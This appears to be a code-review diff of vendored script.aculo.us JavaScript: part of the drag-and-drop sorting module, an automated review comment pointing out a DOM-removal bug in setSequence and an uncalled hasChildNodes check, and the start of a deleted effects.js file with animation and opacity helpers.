endDrag: function(event) {
if(!this.dragging) return;
this.stopScrolling();
this.finishDrag(event, true);
Event.stop(event);
},
draw: function(point) {
var pos = Position.cumulativeOffset(this.element);
var d = this.currentDelta();
pos[0] -= d[0]; pos[1] -= d[1];
if(this.options.scroll && (this.options.scroll != window)) {
pos[0] -= this.options.scroll.scrollLeft-this.originalScrollLeft;
pos[1] -= this.options.scroll.scrollTop-this.originalScrollTop;
}
var p = [0,1].map(function(i){
return (point[i]-pos[i]-this.offset[i])
}.bind(this));
if(this.options.snap) {
if(typeof this.options.snap == 'function') {
p = this.options.snap(p[0],p[1],this);
} else {
if(this.options.snap instanceof Array) {
p = p.map( function(v, i) {
return Math.round(v/this.options.snap[i])*this.options.snap[i] }.bind(this))
} else {
p = p.map( function(v) {
return Math.round(v/this.options.snap)*this.options.snap }.bind(this))
}
}}
var style = this.element.style;
if((!this.options.constraint) || (this.options.constraint=='horizontal'))
style.left = p[0] + "px";
if((!this.options.constraint) || (this.options.constraint=='vertical'))
style.top = p[1] + "px";
if(style.visibility=="hidden") style.visibility = ""; // fix gecko rendering
},
stopScrolling: function() {
if(this.scrollInterval) {
clearInterval(this.scrollInterval);
this.scrollInterval = null;
Draggables._lastScrollPointer = null;
}
},
startScrolling: function(speed) {
if(!(speed[0] || speed[1])) return;
this.scrollSpeed = [speed[0]*this.options.scrollSpeed,speed[1]*this.options.scrollSpeed];
this.lastScrolled = new Date();
this.scrollInterval = setInterval(this.scroll.bind(this), 10);
},
scroll: function() {
var current = new Date();
var delta = current - this.lastScrolled;
this.lastScrolled = current;
if(this.options.scroll == window) {
with (this._getWindowScroll(this.options.scroll)) {
if (this.scrollSpeed[0] || this.scrollSpeed[1]) {
var d = delta / 1000;
this.options.scroll.scrollTo( left + d*this.scrollSpeed[0], top + d*this.scrollSpeed[1] );
}
}
} else {
this.options.scroll.scrollLeft += this.scrollSpeed[0] * delta / 1000;
this.options.scroll.scrollTop += this.scrollSpeed[1] * delta / 1000;
}
Position.prepare();
Droppables.show(Draggables._lastPointer, this.element);
Draggables.notify('onDrag', this);
Draggables._lastScrollPointer = Draggables._lastScrollPointer || $A(Draggables._lastPointer);
Draggables._lastScrollPointer[0] += this.scrollSpeed[0] * delta / 1000;
Draggables._lastScrollPointer[1] += this.scrollSpeed[1] * delta / 1000;
if (Draggables._lastScrollPointer[0] < 0)
Draggables._lastScrollPointer[0] = 0;
if (Draggables._lastScrollPointer[1] < 0)
Draggables._lastScrollPointer[1] = 0;
this.draw(Draggables._lastScrollPointer);
if(this.options.change) this.options.change(this);
},
_getWindowScroll: function(w) {
var T, L, W, H;
with (w.document) {
if (w.document.documentElement && documentElement.scrollTop) {
T = documentElement.scrollTop;
L = documentElement.scrollLeft;
} else if (w.document.body) {
T = body.scrollTop;
L = body.scrollLeft;
}
if (w.innerWidth) {
W = w.innerWidth;
H = w.innerHeight;
} else if (w.document.documentElement && documentElement.clientWidth) {
W = documentElement.clientWidth;
H = documentElement.clientHeight;
} else {
W = body.offsetWidth;
H = body.offsetHeight
}
}
return { top: T, left: L, width: W, height: H };
}
}
/*--------------------------------------------------------------------------*/
var SortableObserver = Class.create();
SortableObserver.prototype = {
initialize: function(element, observer) {
this.element = $(element);
this.observer = observer;
this.lastValue = Sortable.serialize(this.element);
},
onStart: function() {
this.lastValue = Sortable.serialize(this.element);
},
onEnd: function() {
Sortable.unmark();
if(this.lastValue != Sortable.serialize(this.element))
this.observer(this.element)
}
}
var Sortable = {
sortables: {},
_findRootElement: function(element) {
while (element.tagName != "BODY") {
if(element.id && Sortable.sortables[element.id]) return element;
element = element.parentNode;
}
},
options: function(element) {
element = Sortable._findRootElement($(element));
if(!element) return;
return Sortable.sortables[element.id];
},
destroy: function(element){
var s = Sortable.options(element);
if(s) {
Draggables.removeObserver(s.element);
s.droppables.each(function(d){ Droppables.remove(d) });
s.draggables.invoke('destroy');
delete Sortable.sortables[s.element.id];
}
},
create: function(element) {
element = $(element);
var options = Object.extend({
element: element,
tag: 'li', // assumes li children, override with tag: 'tagname'
dropOnEmpty: false,
tree: false,
treeTag: 'ul',
overlap: 'vertical', // one of 'vertical', 'horizontal'
constraint: 'vertical', // one of 'vertical', 'horizontal', false
containment: element, // also takes array of elements (or id's); or false
handle: false, // or a CSS class
only: false,
hoverclass: null,
ghosting: false,
scroll: false,
scrollSensitivity: 20,
scrollSpeed: 15,
format: /^[^_]*_(.*)$/,
onChange: Prototype.emptyFunction,
onUpdate: Prototype.emptyFunction
}, arguments[1] || {});
// clear any old sortable with same element
this.destroy(element);
// build options for the draggables
var options_for_draggable = {
revert: true,
scroll: options.scroll,
scrollSpeed: options.scrollSpeed,
scrollSensitivity: options.scrollSensitivity,
ghosting: options.ghosting,
constraint: options.constraint,
handle: options.handle };
if(options.starteffect)
options_for_draggable.starteffect = options.starteffect;
if(options.reverteffect)
options_for_draggable.reverteffect = options.reverteffect;
else
if(options.ghosting) options_for_draggable.reverteffect = function(element) {
element.style.top = 0;
element.style.left = 0;
};
if(options.endeffect)
options_for_draggable.endeffect = options.endeffect;
if(options.zindex)
options_for_draggable.zindex = options.zindex;
// build options for the droppables
var options_for_droppable = {
overlap: options.overlap,
containment: options.containment,
tree: options.tree,
hoverclass: options.hoverclass,
onHover: Sortable.onHover
//greedy: !options.dropOnEmpty
}
var options_for_tree = {
onHover: Sortable.onEmptyHover,
overlap: options.overlap,
containment: options.containment,
hoverclass: options.hoverclass
}
// fix for gecko engine
Element.cleanWhitespace(element);
options.draggables = [];
options.droppables = [];
// drop on empty handling
if(options.dropOnEmpty || options.tree) {
Droppables.add(element, options_for_tree);
options.droppables.push(element);
}
(this.findElements(element, options) || []).each( function(e) {
// handles are per-draggable
var handle = options.handle ?
Element.childrenWithClassName(e, options.handle)[0] : e;
options.draggables.push(
new Draggable(e, Object.extend(options_for_draggable, { handle: handle })));
Droppables.add(e, options_for_droppable);
if(options.tree) e.treeNode = element;
options.droppables.push(e);
});
if(options.tree) {
(Sortable.findTreeElements(element, options) || []).each( function(e) {
Droppables.add(e, options_for_tree);
e.treeNode = element;
options.droppables.push(e);
});
}
// keep reference
this.sortables[element.id] = options;
// for onupdate
Draggables.addObserver(new SortableObserver(element, options.onUpdate));
},
// return all suitable-for-sortable elements in a guaranteed order
findElements: function(element, options) {
return Element.findChildren(
element, options.only, options.tree ? true : false, options.tag);
},
findTreeElements: function(element, options) {
return Element.findChildren(
element, options.only, options.tree ? true : false, options.treeTag);
},
onHover: function(element, dropon, overlap) {
if(Element.isParent(dropon, element)) return;
if(overlap > .33 && overlap < .66 && Sortable.options(dropon).tree) {
return;
} else if(overlap>0.5) {
Sortable.mark(dropon, 'before');
if(dropon.previousSibling != element) {
var oldParentNode = element.parentNode;
element.style.visibility = "hidden"; // fix gecko rendering
dropon.parentNode.insertBefore(element, dropon);
if(dropon.parentNode!=oldParentNode)
Sortable.options(oldParentNode).onChange(element);
Sortable.options(dropon.parentNode).onChange(element);
}
} else {
Sortable.mark(dropon, 'after');
var nextElement = dropon.nextSibling || null;
if(nextElement != element) {
var oldParentNode = element.parentNode;
element.style.visibility = "hidden"; // fix gecko rendering
dropon.parentNode.insertBefore(element, nextElement);
if(dropon.parentNode!=oldParentNode)
Sortable.options(oldParentNode).onChange(element);
Sortable.options(dropon.parentNode).onChange(element);
}
}
},
onEmptyHover: function(element, dropon, overlap) {
var oldParentNode = element.parentNode;
var droponOptions = Sortable.options(dropon);
if(!Element.isParent(dropon, element)) {
var index;
var children = Sortable.findElements(dropon, {tag: droponOptions.tag, only: droponOptions.only});
var child = null;
if(children) {
var offset = Element.offsetSize(dropon, droponOptions.overlap) * (1.0 - overlap);
for (index = 0; index < children.length; index += 1) {
if (offset - Element.offsetSize (children[index], droponOptions.overlap) >= 0) {
offset -= Element.offsetSize (children[index], droponOptions.overlap);
} else if (offset - (Element.offsetSize (children[index], droponOptions.overlap) / 2) >= 0) {
child = index + 1 < children.length ? children[index + 1] : null;
break;
} else {
child = children[index];
break;
}
}
}
dropon.insertBefore(element, child);
Sortable.options(oldParentNode).onChange(element);
droponOptions.onChange(element);
}
},
unmark: function() {
if(Sortable._marker) Element.hide(Sortable._marker);
},
mark: function(dropon, position) {
// mark on ghosting only
var sortable = Sortable.options(dropon.parentNode);
if(sortable && !sortable.ghosting) return;
if(!Sortable._marker) {
Sortable._marker = $('dropmarker') || document.createElement('DIV');
Element.hide(Sortable._marker);
Element.addClassName(Sortable._marker, 'dropmarker');
Sortable._marker.style.position = 'absolute';
document.getElementsByTagName("body").item(0).appendChild(Sortable._marker);
}
var offsets = Position.cumulativeOffset(dropon);
Sortable._marker.style.left = offsets[0] + 'px';
Sortable._marker.style.top = offsets[1] + 'px';
if(position=='after')
if(sortable.overlap == 'horizontal')
Sortable._marker.style.left = (offsets[0]+dropon.clientWidth) + 'px';
else
Sortable._marker.style.top = (offsets[1]+dropon.clientHeight) + 'px';
Element.show(Sortable._marker);
},
_tree: function(element, options, parent) {
var children = Sortable.findElements(element, options) || [];
for (var i = 0; i < children.length; ++i) {
var match = children[i].id.match(options.format);
if (!match) continue;
var child = {
id: encodeURIComponent(match ? match[1] : null),
element: element,
parent: parent,
children: new Array,
position: parent.children.length,
container: Sortable._findChildrenElement(children[i], options.treeTag.toUpperCase())
}
/* Get the element containing the children and recurse over it */
if (child.container)
this._tree(child.container, options, child)
parent.children.push (child);
}
return parent;
},
/* Finds the first element of the given tag type within a parent element.
Used for finding the first LI[ST] within a L[IST]I[TEM].*/
_findChildrenElement: function (element, containerTag) {
if (element && element.hasChildNodes)
for (var i = 0; i < element.childNodes.length; ++i)
if (element.childNodes[i].tagName == containerTag)
return element.childNodes[i];
return null;
},
tree: function(element) {
element = $(element);
var sortableOptions = this.options(element);
var options = Object.extend({
tag: sortableOptions.tag,
treeTag: sortableOptions.treeTag,
only: sortableOptions.only,
name: element.id,
format: sortableOptions.format
}, arguments[1] || {});
var root = {
id: null,
parent: null,
children: new Array,
container: element,
position: 0
}
return Sortable._tree (element, options, root);
},
/* Construct a [i] index for a particular node */
_constructIndex: function(node) {
var index = '';
do {
if (node.id) index = '[' + node.position + ']' + index;
} while ((node = node.parent) != null);
return index;
},
sequence: function(element) {
element = $(element);
var options = Object.extend(this.options(element), arguments[1] || {});
return $(this.findElements(element, options) || []).map( function(item) {
return item.id.match(options.format) ? item.id.match(options.format)[1] : '';
});
},
setSequence: function(element, new_sequence) {
element = $(element);
var options = Object.extend(this.options(element), arguments[2] || {});
var nodeMap = {};
this.findElements(element, options).each( function(n) {
if (n.id.match(options.format))
nodeMap[n.id.match(options.format)[1]] = [n, n.parentNode];
n.parentNode.removeChild(n);
});
new_sequence.each(function(ident) {
var n = nodeMap[ident];
if (n) {
n[1].appendChild(n[0]);
delete nodeMap[ident];
}
});
},
serialize: function(element) {
element = $(element);
var options = Object.extend(Sortable.options(element), arguments[1] || {});
var name = encodeURIComponent(
(arguments[1] && arguments[1].name) ? arguments[1].name : element.id);
if (options.tree) {
return Sortable.tree(element, arguments[1]).children.map( function (item) {
return [name + Sortable._constructIndex(item) + "[id]=" +
encodeURIComponent(item.id)].concat(item.children.map(arguments.callee));
}).flatten().join('&');
} else {
return Sortable.sequence(element, arguments[1]).map( function(item) {
return name + "[]=" + encodeURIComponent(item);
}).join('&');
}
}
}
/* Returns true if child is contained within element */
Element.isParent = function(child, element) {
if (!child.parentNode || child == element) return false;
if (child.parentNode == element) return true;
return Element.isParent(child.parentNode, element);
}
Element.findChildren = function(element, only, recursive, tagName) {
if(!element.hasChildNodes()) return null;
tagName = tagName.toUpperCase();
if(only) only = [only].flatten();
var elements = [];
$A(element.childNodes).each( function(e) {
if(e.tagName && e.tagName.toUpperCase()==tagName &&
(!only || (Element.classNames(e).detect(function(v) { return only.include(v) }))))
elements.push(e);
if(recursive) {
var grandchildren = Element.findChildren(e, only, recursive, tagName);
if(grandchildren) elements.push(grandchildren);
}
});
return (elements.length>0 ? elements.flatten() : []);
}
Element.offsetSize = function (element, type) {
if (type == 'vertical' || type == 'height')
return element.offsetHeight;
else
return element.offsetWidth;
}
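Review bot: in `setSequence`, `n.parentNode.removeChild(n)` sits outside the unbraced `if (n.id.match(options.format))`, so every element returned by `findElements` is detached, but only those with a matching id are stored in `nodeMap`. Elements with non-matching ids, and matching ones whose ident is absent from `new_sequence`, are therefore dropped from the DOM and never re-appended. If this file is carried over to the branch, either move the removal inside the match check or re-append whatever is left in `nodeMap` after the loop. A smaller point in `_findChildrenElement`: `element.hasChildNodes` is tested as a property rather than called, so the guard is true for any DOM node; `Element.findChildren` further down calls `hasChildNodes()` correctly.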

959
js/effects.js vendored

@@ -1,959 +0,0 @@
// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// Contributors:
// Justin Palmer (http://encytemedia.com/)
// Mark Pilgrim (http://diveintomark.org/)
// Martin Bialasinki
//
// See scriptaculous.js for full license.
// converts rgb() and #xxx to #xxxxxx format,
// returns self (or first argument) if not convertable
String.prototype.parseColor = function() {
var color = '#';
if(this.slice(0,4) == 'rgb(') {
var cols = this.slice(4,this.length-1).split(',');
var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3);
} else {
if(this.slice(0,1) == '#') {
if(this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase();
if(this.length==7) color = this.toLowerCase();
}
}
return(color.length==7 ? color : (arguments[0] || this));
}
/*--------------------------------------------------------------------------*/
Element.collectTextNodes = function(element) {
return $A($(element).childNodes).collect( function(node) {
return (node.nodeType==3 ? node.nodeValue :
(node.hasChildNodes() ? Element.collectTextNodes(node) : ''));
}).flatten().join('');
}
Element.collectTextNodesIgnoreClass = function(element, className) {
return $A($(element).childNodes).collect( function(node) {
return (node.nodeType==3 ? node.nodeValue :
((node.hasChildNodes() && !Element.hasClassName(node,className)) ?
Element.collectTextNodesIgnoreClass(node, className) : ''));
}).flatten().join('');
}
Element.setContentZoom = function(element, percent) {
element = $(element);
Element.setStyle(element, {fontSize: (percent/100) + 'em'});
if(navigator.appVersion.indexOf('AppleWebKit')>0) window.scrollBy(0,0);
}
Element.getOpacity = function(element){
var opacity;
if (opacity = Element.getStyle(element, 'opacity'))
return parseFloat(opacity);
if (opacity = (Element.getStyle(element, 'filter') || '').match(/alpha\(opacity=(.*)\)/))
if(opacity[1]) return parseFloat(opacity[1]) / 100;
return 1.0;
}
Element.setOpacity = function(element, value){
element= $(element);
if (value == 1){
Element.setStyle(element, { opacity:
(/Gecko/.test(navigator.userAgent) && !/Konqueror|Safari|KHTML/.test(navigator.userAgent)) ?
0.999999 : null });
if(/MSIE/.test(navigator.userAgent))
Element.setStyle(element, {filter: Element.getStyle(element,'filter').replace(/alpha\([^\)]*\)/gi,'')});
} else {
if(value < 0.00001) value = 0;
Element.setStyle(element, {opacity: value});
if(/MSIE/.test(navigator.userAgent))
Element.setStyle(element,
{ filter: Element.getStyle(element,'filter').replace(/alpha\([^\)]*\)/gi,'') +
'alpha(opacity='+value*100+')' });
}
}
Element.getInlineOpacity = function(element){
return $(element).style.opacity || '';
}
Element.childrenWithClassName = function(element, className, findFirst) {
var classNameRegExp = new RegExp("(^|\\s)" + className + "(\\s|$)");
var results = $A($(element).getElementsByTagName('*'))[findFirst ? 'detect' : 'select']( function(c) {
return (c.className && c.className.match(classNameRegExp));
});
if(!results) results = [];
return results;
}
Element.forceRerendering = function(element) {
try {
element = $(element);
var n = document.createTextNode(' ');
element.appendChild(n);
element.removeChild(n);
} catch(e) { }
};
/*--------------------------------------------------------------------------*/
Array.prototype.call = function() {
var args = arguments;
this.each(function(f){ f.apply(this, args) });
}
/*--------------------------------------------------------------------------*/
var Effect = {
tagifyText: function(element) {
if(typeof Builder == 'undefined')
throw("Effect.tagifyText requires including script.aculo.us' builder.js library");
var tagifyStyle = 'position:relative';
if(/MSIE/.test(navigator.userAgent)) tagifyStyle += ';zoom:1';
element = $(element);
$A(element.childNodes).each( function(child) {
if(child.nodeType==3) {
child.nodeValue.toArray().each( function(character) {
element.insertBefore(
Builder.node('span',{style: tagifyStyle},
character == ' ' ? String.fromCharCode(160) : character),
child);
});
Element.remove(child);
}
});
},
multiple: function(element, effect) {
var elements;
if(((typeof element == 'object') ||
(typeof element == 'function')) &&
(element.length))
elements = element;
else
elements = $(element).childNodes;
var options = Object.extend({
speed: 0.1,
delay: 0.0
}, arguments[2] || {});
var masterDelay = options.delay;
$A(elements).each( function(element, index) {
new effect(element, Object.extend(options, { delay: index * options.speed + masterDelay }));
});
},
PAIRS: {
'slide': ['SlideDown','SlideUp'],
'blind': ['BlindDown','BlindUp'],
'appear': ['Appear','Fade']
},
toggle: function(element, effect) {
element = $(element);
effect = (effect || 'appear').toLowerCase();
var options = Object.extend({
queue: { position:'end', scope:(element.id || 'global'), limit: 1 }
}, arguments[2] || {});
Effect[element.visible() ?
Effect.PAIRS[effect][1] : Effect.PAIRS[effect][0]](element, options);
}
};
var Effect2 = Effect; // deprecated
/* ------------- transitions ------------- */
Effect.Transitions = {}
Effect.Transitions.linear = Prototype.K;
Effect.Transitions.sinoidal = function(pos) {
return (-Math.cos(pos*Math.PI)/2) + 0.5;
}
Effect.Transitions.reverse = function(pos) {
return 1-pos;
}
Effect.Transitions.flicker = function(pos) {
return ((-Math.cos(pos*Math.PI)/4) + 0.75) + Math.random()/4;
}
Effect.Transitions.wobble = function(pos) {
return (-Math.cos(pos*Math.PI*(9*pos))/2) + 0.5;
}
Effect.Transitions.pulse = function(pos) {
return (Math.floor(pos*10) % 2 == 0 ?
(pos*10-Math.floor(pos*10)) : 1-(pos*10-Math.floor(pos*10)));
}
Effect.Transitions.none = function(pos) {
return 0;
}
Effect.Transitions.full = function(pos) {
return 1;
}
/* ------------- core effects ------------- */
Effect.ScopedQueue = Class.create();
Object.extend(Object.extend(Effect.ScopedQueue.prototype, Enumerable), {
initialize: function() {
this.effects = [];
this.interval = null;
},
_each: function(iterator) {
this.effects._each(iterator);
},
add: function(effect) {
var timestamp = new Date().getTime();
var position = (typeof effect.options.queue == 'string') ?
effect.options.queue : effect.options.queue.position;
switch(position) {
case 'front':
// move unstarted effects after this effect
this.effects.findAll(function(e){ return e.state=='idle' }).each( function(e) {
e.startOn += effect.finishOn;
e.finishOn += effect.finishOn;
});
break;
case 'end':
// start effect after last queued effect has finished
timestamp = this.effects.pluck('finishOn').max() || timestamp;
break;
}
effect.startOn += timestamp;
effect.finishOn += timestamp;
if(!effect.options.queue.limit || (this.effects.length < effect.options.queue.limit))
this.effects.push(effect);
if(!this.interval)
this.interval = setInterval(this.loop.bind(this), 40);
},
remove: function(effect) {
this.effects = this.effects.reject(function(e) { return e==effect });
if(this.effects.length == 0) {
clearInterval(this.interval);
this.interval = null;
}
},
loop: function() {
var timePos = new Date().getTime();
this.effects.invoke('loop', timePos);
}
});
Effect.Queues = {
instances: $H(),
get: function(queueName) {
if(typeof queueName != 'string') return queueName;
if(!this.instances[queueName])
this.instances[queueName] = new Effect.ScopedQueue();
return this.instances[queueName];
}
}
Effect.Queue = Effect.Queues.get('global');
Effect.DefaultOptions = {
transition: Effect.Transitions.sinoidal,
duration: 1.0, // seconds
fps: 25.0, // max. 25fps due to Effect.Queue implementation
sync: false, // true for combining
from: 0.0,
to: 1.0,
delay: 0.0,
queue: 'parallel'
}
Effect.Base = function() {};
Effect.Base.prototype = {
position: null,
start: function(options) {
this.options = Object.extend(Object.extend({},Effect.DefaultOptions), options || {});
this.currentFrame = 0;
this.state = 'idle';
this.startOn = this.options.delay*1000;
this.finishOn = this.startOn + (this.options.duration*1000);
this.event('beforeStart');
if(!this.options.sync)
Effect.Queues.get(typeof this.options.queue == 'string' ?
'global' : this.options.queue.scope).add(this);
},
loop: function(timePos) {
if(timePos >= this.startOn) {
if(timePos >= this.finishOn) {
this.render(1.0);
this.cancel();
this.event('beforeFinish');
if(this.finish) this.finish();
this.event('afterFinish');
return;
}
var pos = (timePos - this.startOn) / (this.finishOn - this.startOn);
var frame = Math.round(pos * this.options.fps * this.options.duration);
if(frame > this.currentFrame) {
this.render(pos);
this.currentFrame = frame;
}
}
},
render: function(pos) {
if(this.state == 'idle') {
this.state = 'running';
this.event('beforeSetup');
if(this.setup) this.setup();
this.event('afterSetup');
}
if(this.state == 'running') {
if(this.options.transition) pos = this.options.transition(pos);
pos *= (this.options.to-this.options.from);
pos += this.options.from;
this.position = pos;
this.event('beforeUpdate');
if(this.update) this.update(pos);
this.event('afterUpdate');
}
},
cancel: function() {
if(!this.options.sync)
Effect.Queues.get(typeof this.options.queue == 'string' ?
'global' : this.options.queue.scope).remove(this);
this.state = 'finished';
},
event: function(eventName) {
if(this.options[eventName + 'Internal']) this.options[eventName + 'Internal'](this);
if(this.options[eventName]) this.options[eventName](this);
},
inspect: function() {
return '#<Effect:' + $H(this).inspect() + ',options:' + $H(this.options).inspect() + '>';
}
}
Effect.Parallel = Class.create();
Object.extend(Object.extend(Effect.Parallel.prototype, Effect.Base.prototype), {
initialize: function(effects) {
this.effects = effects || [];
this.start(arguments[1]);
},
update: function(position) {
this.effects.invoke('render', position);
},
finish: function(position) {
this.effects.each( function(effect) {
effect.render(1.0);
effect.cancel();
effect.event('beforeFinish');
if(effect.finish) effect.finish(position);
effect.event('afterFinish');
});
}
});
Effect.Opacity = Class.create();
Object.extend(Object.extend(Effect.Opacity.prototype, Effect.Base.prototype), {
initialize: function(element) {
this.element = $(element);
// make this work on IE on elements without 'layout'
if(/MSIE/.test(navigator.userAgent) && (!this.element.currentStyle.hasLayout))
this.element.setStyle({zoom: 1});
var options = Object.extend({
from: this.element.getOpacity() || 0.0,
to: 1.0
}, arguments[1] || {});
this.start(options);
},
update: function(position) {
this.element.setOpacity(position);
}
});
Effect.Move = Class.create();
Object.extend(Object.extend(Effect.Move.prototype, Effect.Base.prototype), {
initialize: function(element) {
this.element = $(element);
var options = Object.extend({
x: 0,
y: 0,
mode: 'relative'
}, arguments[1] || {});
this.start(options);
},
setup: function() {
// Bug in Opera: Opera returns the "real" position of a static element or
// relative element that does not have top/left explicitly set.
// ==> Always set top and left for position relative elements in your stylesheets
// (to 0 if you do not need them)
this.element.makePositioned();
this.originalLeft = parseFloat(this.element.getStyle('left') || '0');
this.originalTop = parseFloat(this.element.getStyle('top') || '0');
if(this.options.mode == 'absolute') {
// absolute movement, so we need to calc deltaX and deltaY
this.options.x = this.options.x - this.originalLeft;
this.options.y = this.options.y - this.originalTop;
}
},
update: function(position) {
this.element.setStyle({
left: Math.round(this.options.x * position + this.originalLeft) + 'px',
top: Math.round(this.options.y * position + this.originalTop) + 'px'
});
}
});
// for backwards compatibility
Effect.MoveBy = function(element, toTop, toLeft) {
return new Effect.Move(element,
Object.extend({ x: toLeft, y: toTop }, arguments[3] || {}));
};
Effect.Scale = Class.create();
Object.extend(Object.extend(Effect.Scale.prototype, Effect.Base.prototype), {
initialize: function(element, percent) {
this.element = $(element)
var options = Object.extend({
scaleX: true,
scaleY: true,
scaleContent: true,
scaleFromCenter: false,
scaleMode: 'box', // 'box' or 'contents' or {} with provided values
scaleFrom: 100.0,
scaleTo: percent
}, arguments[2] || {});
this.start(options);
},
setup: function() {
this.restoreAfterFinish = this.options.restoreAfterFinish || false;
this.elementPositioning = this.element.getStyle('position');
this.originalStyle = {};
['top','left','width','height','fontSize'].each( function(k) {
this.originalStyle[k] = this.element.style[k];
}.bind(this));
this.originalTop = this.element.offsetTop;
this.originalLeft = this.element.offsetLeft;
var fontSize = this.element.getStyle('font-size') || '100%';
['em','px','%','pt'].each( function(fontSizeType) {
if(fontSize.indexOf(fontSizeType)>0) {
this.fontSize = parseFloat(fontSize);
this.fontSizeType = fontSizeType;
}
}.bind(this));
this.factor = (this.options.scaleTo - this.options.scaleFrom)/100;
this.dims = null;
if(this.options.scaleMode=='box')
this.dims = [this.element.offsetHeight, this.element.offsetWidth];
if(/^content/.test(this.options.scaleMode))
this.dims = [this.element.scrollHeight, this.element.scrollWidth];
if(!this.dims)
this.dims = [this.options.scaleMode.originalHeight,
this.options.scaleMode.originalWidth];
},
update: function(position) {
var currentScale = (this.options.scaleFrom/100.0) + (this.factor * position);
if(this.options.scaleContent && this.fontSize)
this.element.setStyle({fontSize: this.fontSize * currentScale + this.fontSizeType });
this.setDimensions(this.dims[0] * currentScale, this.dims[1] * currentScale);
},
finish: function(position) {
if (this.restoreAfterFinish) this.element.setStyle(this.originalStyle);
},
setDimensions: function(height, width) {
var d = {};
if(this.options.scaleX) d.width = Math.round(width) + 'px';
if(this.options.scaleY) d.height = Math.round(height) + 'px';
if(this.options.scaleFromCenter) {
var topd = (height - this.dims[0])/2;
var leftd = (width - this.dims[1])/2;
if(this.elementPositioning == 'absolute') {
if(this.options.scaleY) d.top = this.originalTop-topd + 'px';
if(this.options.scaleX) d.left = this.originalLeft-leftd + 'px';
} else {
if(this.options.scaleY) d.top = -topd + 'px';
if(this.options.scaleX) d.left = -leftd + 'px';
}
}
this.element.setStyle(d);
}
});
Effect.Highlight = Class.create();
Object.extend(Object.extend(Effect.Highlight.prototype, Effect.Base.prototype), {
initialize: function(element) {
this.element = $(element);
var options = Object.extend({ startcolor: '#ffff99' }, arguments[1] || {});
this.start(options);
},
setup: function() {
// Prevent executing on elements not in the layout flow
if(this.element.getStyle('display')=='none') { this.cancel(); return; }
// Disable background image during the effect
this.oldStyle = {
backgroundImage: this.element.getStyle('background-image') };
this.element.setStyle({backgroundImage: 'none'});
if(!this.options.endcolor)
this.options.endcolor = this.element.getStyle('background-color').parseColor('#ffffff');
if(!this.options.restorecolor)
this.options.restorecolor = this.element.getStyle('background-color');
// init color calculations
this._base = $R(0,2).map(function(i){ return parseInt(this.options.startcolor.slice(i*2+1,i*2+3),16) }.bind(this));
this._delta = $R(0,2).map(function(i){ return parseInt(this.options.endcolor.slice(i*2+1,i*2+3),16)-this._base[i] }.bind(this));
},
update: function(position) {
this.element.setStyle({backgroundColor: $R(0,2).inject('#',function(m,v,i){
return m+(Math.round(this._base[i]+(this._delta[i]*position)).toColorPart()); }.bind(this)) });
},
finish: function() {
this.element.setStyle(Object.extend(this.oldStyle, {
backgroundColor: this.options.restorecolor
}));
}
});
Effect.ScrollTo = Class.create();
Object.extend(Object.extend(Effect.ScrollTo.prototype, Effect.Base.prototype), {
initialize: function(element) {
this.element = $(element);
this.start(arguments[1] || {});
},
setup: function() {
Position.prepare();
var offsets = Position.cumulativeOffset(this.element);
if(this.options.offset) offsets[1] += this.options.offset;
var max = window.innerHeight ?
window.height - window.innerHeight :
document.body.scrollHeight -
(document.documentElement.clientHeight ?
document.documentElement.clientHeight : document.body.clientHeight);
this.scrollStart = Position.deltaY;
this.delta = (offsets[1] > max ? max : offsets[1]) - this.scrollStart;
},
update: function(position) {
Position.prepare();
window.scrollTo(Position.deltaX,
this.scrollStart + (position*this.delta));
}
});
/* ------------- combination effects ------------- */
Effect.Fade = function(element) {
element = $(element);
var oldOpacity = element.getInlineOpacity();
var options = Object.extend({
from: element.getOpacity() || 1.0,
to: 0.0,
afterFinishInternal: function(effect) {
if(effect.options.to!=0) return;
effect.element.hide();
effect.element.setStyle({opacity: oldOpacity});
}}, arguments[1] || {});
return new Effect.Opacity(element,options);
}
Effect.Appear = function(element) {
element = $(element);
var options = Object.extend({
from: (element.getStyle('display') == 'none' ? 0.0 : element.getOpacity() || 0.0),
to: 1.0,
// force Safari to render floated elements properly
afterFinishInternal: function(effect) {
effect.element.forceRerendering();
},
beforeSetup: function(effect) {
effect.element.setOpacity(effect.options.from);
effect.element.show();
}}, arguments[1] || {});
return new Effect.Opacity(element,options);
}
Effect.Puff = function(element) {
element = $(element);
var oldStyle = { opacity: element.getInlineOpacity(), position: element.getStyle('position') };
return new Effect.Parallel(
[ new Effect.Scale(element, 200,
{ sync: true, scaleFromCenter: true, scaleContent: true, restoreAfterFinish: true }),
new Effect.Opacity(element, { sync: true, to: 0.0 } ) ],
Object.extend({ duration: 1.0,
beforeSetupInternal: function(effect) {
effect.effects[0].element.setStyle({position: 'absolute'}); },
afterFinishInternal: function(effect) {
effect.effects[0].element.hide();
effect.effects[0].element.setStyle(oldStyle); }
}, arguments[1] || {})
);
}
Effect.BlindUp = function(element) {
element = $(element);
element.makeClipping();
return new Effect.Scale(element, 0,
Object.extend({ scaleContent: false,
scaleX: false,
restoreAfterFinish: true,
afterFinishInternal: function(effect) {
effect.element.hide();
effect.element.undoClipping();
}
}, arguments[1] || {})
);
}
Effect.BlindDown = function(element) {
element = $(element);
var elementDimensions = element.getDimensions();
return new Effect.Scale(element, 100, Object.extend({
scaleContent: false,
scaleX: false,
scaleFrom: 0,
scaleMode: {originalHeight: elementDimensions.height, originalWidth: elementDimensions.width},
restoreAfterFinish: true,
afterSetup: function(effect) {
effect.element.makeClipping();
effect.element.setStyle({height: '0px'});
effect.element.show();
},
afterFinishInternal: function(effect) {
effect.element.undoClipping();
}
}, arguments[1] || {}));
}
Effect.SwitchOff = function(element) {
element = $(element);
var oldOpacity = element.getInlineOpacity();
return new Effect.Appear(element, Object.extend({
duration: 0.4,
from: 0,
transition: Effect.Transitions.flicker,
afterFinishInternal: function(effect) {
new Effect.Scale(effect.element, 1, {
duration: 0.3, scaleFromCenter: true,
scaleX: false, scaleContent: false, restoreAfterFinish: true,
beforeSetup: function(effect) {
effect.element.makePositioned();
effect.element.makeClipping();
},
afterFinishInternal: function(effect) {
effect.element.hide();
effect.element.undoClipping();
effect.element.undoPositioned();
effect.element.setStyle({opacity: oldOpacity});
}
})
}
}, arguments[1] || {}));
}
Effect.DropOut = function(element) {
element = $(element);
var oldStyle = {
top: element.getStyle('top'),
left: element.getStyle('left'),
opacity: element.getInlineOpacity() };
return new Effect.Parallel(
